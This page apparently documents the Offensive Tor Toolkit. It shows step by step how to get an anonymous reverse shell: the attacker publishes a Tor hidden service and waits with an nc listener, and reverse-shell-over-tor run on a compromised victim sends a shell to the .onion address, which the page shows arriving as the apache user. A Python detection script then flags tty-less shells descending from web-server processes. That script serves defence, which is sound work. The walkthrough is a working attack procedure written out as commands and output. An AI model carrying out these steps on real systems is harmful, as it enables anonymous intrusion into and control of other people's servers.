Offensive Tor Toolkit
Gaining access with reverse-shell-over-tor


Last updated 3 years ago


We assume that we are already able to execute commands on Victim1 by some means.

To obtain a reverse shell while preserving anonymity, we will use reverse-shell-over-tor from Offensive Tor Toolkit. As shown in the following illustration, the attacker publishes a Hidden Service so that the victim can send the reverse shell to it.

1. Hidden Service and handler

The attacker will publish a Hidden Service so that the victim can connect to it:

[attacker]$ grep '^HiddenService' /etc/tor/torrc
HiddenServiceDir /tmp/tortest
HiddenServicePort 4444 127.0.0.1:4444

[attacker]$ cat /tmp/tortest/hostname
m5et..jyd.onion

[attacker]$ tor -f /etc/tor/torrc

In order to handle the connection, the attacker will start a listener with netcat:

[attacker]$ nc -lvnp 4444

2. Victim connects to the Hidden Service

We have to launch a reverse shell from the Victim to the Hidden Service. The tool we need is reverse-shell-over-tor. The only parameter it requires is the address and port on which the Hidden Service is listening.

[victim1]$ ./reverse-shell-over-tor -listener m5et..jyd.onion:4444

3. The handler receives the shell

Once the victim connects with reverse-shell-over-tor, a /bin/sh shell is launched and handed to the listener started in step 1:

[attacker]$ nc -lvnp 4444
...
id
uid=48(apache) gid=48(apache) groups=48(apache)

The attacker can change the shell binary with the -reverse-shell-program parameter.
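From the defender's side, the artifacts this walkthrough leaves on the victim are host-level rather than network-level: the Tor connection itself is encrypted and does not carry the .onion address in the clear, but the web-server account (uid 48, apache above) ends up running a tty-less /bin/sh whose parent is the reverse-shell-over-tor process, which in turn descends from the web server. The following script is an added example, not part of Offensive Tor Toolkit, that flags exactly that pattern over a constructed snapshot of `ps -eo pid,ppid,user,tty,comm` output; the process names, PIDs and the lists of web-server accounts and shell names are assumptions chosen for the illustration.

```python
"""Flag tty-less shells spawned under a web-server process lineage.

Added detection example; it is not code from Offensive Tor Toolkit.
"""
from dataclasses import dataclass

# Constructed sample of `ps -eo pid,ppid,user,tty,comm` output (not captured
# from a real host). PID 902 mirrors the walkthrough: apache -> reverse shell -> sh.
SAMPLE_PS = """\
  PID  PPID USER     TT       COMMAND
    1     0 root     ?        systemd
  812     1 root     ?        httpd
  830   812 apache   ?        httpd
  901   830 apache   ?        reverse-shell-over-tor
  902   901 apache   ?        sh
 1203     1 tor      ?        tor
 2100  2099 alice    pts/0    bash
"""

# Assumed service accounts and daemon names; extend for your own environment.
WEB_ACCOUNTS = {"apache", "www-data", "nginx", "httpd"}
WEB_DAEMONS = {"httpd", "apache2", "nginx"}
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}


@dataclass
class Proc:
    pid: int
    ppid: int
    user: str
    tty: str
    comm: str


def parse_ps(text: str) -> dict[int, Proc]:
    """Parse fixed-column ps output (header on the first line) into a pid map."""
    procs: dict[int, Proc] = {}
    for line in text.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 4)             # COMMAND may itself contain spaces
        if len(parts) != 5:
            continue
        pid, ppid, user, tty, comm = parts
        procs[int(pid)] = Proc(int(pid), int(ppid), user, tty, comm)
    return procs


def lineage(procs: dict[int, Proc], pid: int) -> list[Proc]:
    """Walk parent pointers from pid up to the root, guarding against cycles."""
    chain: list[Proc] = []
    seen: set[int] = set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid])
        pid = procs[pid].ppid
    return chain


def find_suspicious_shells(procs: dict[int, Proc]) -> list[dict]:
    """Return shells with no controlling tty that run as, or descend from, a web server.

    A web server has no business spawning an interactive shell; a shell whose
    stdio is a socket instead of a terminal under that lineage is the classic
    reverse-shell footprint, regardless of where the socket leads (Tor or not).
    """
    findings = []
    for p in procs.values():
        if p.comm not in SHELLS or p.tty != "?":
            continue                              # interactive admin shells are fine
        chain = lineage(procs, p.pid)
        web_owned = p.user in WEB_ACCOUNTS
        web_parent = any(a.user in WEB_ACCOUNTS or a.comm in WEB_DAEMONS
                         for a in chain[1:])
        if web_owned or web_parent:
            findings.append({
                "pid": p.pid,
                "user": p.user,
                "chain": " <- ".join(f"{a.comm}({a.pid})" for a in chain),
            })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_shells(parse_ps(SAMPLE_PS)):
        print(f"suspicious shell pid={f['pid']} user={f['user']}: {f['chain']}")
```

Run it against live output with `ps -eo pid,ppid,user,tty,comm` piped into `parse_ps`; the same lineage check generalizes to any tty-less shell under a service account, not only one spawned by this toolkit. Pair it with an audit rule on execve by the web-server user if the server is not expected to fork anything at all.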

Reverse shell over Tor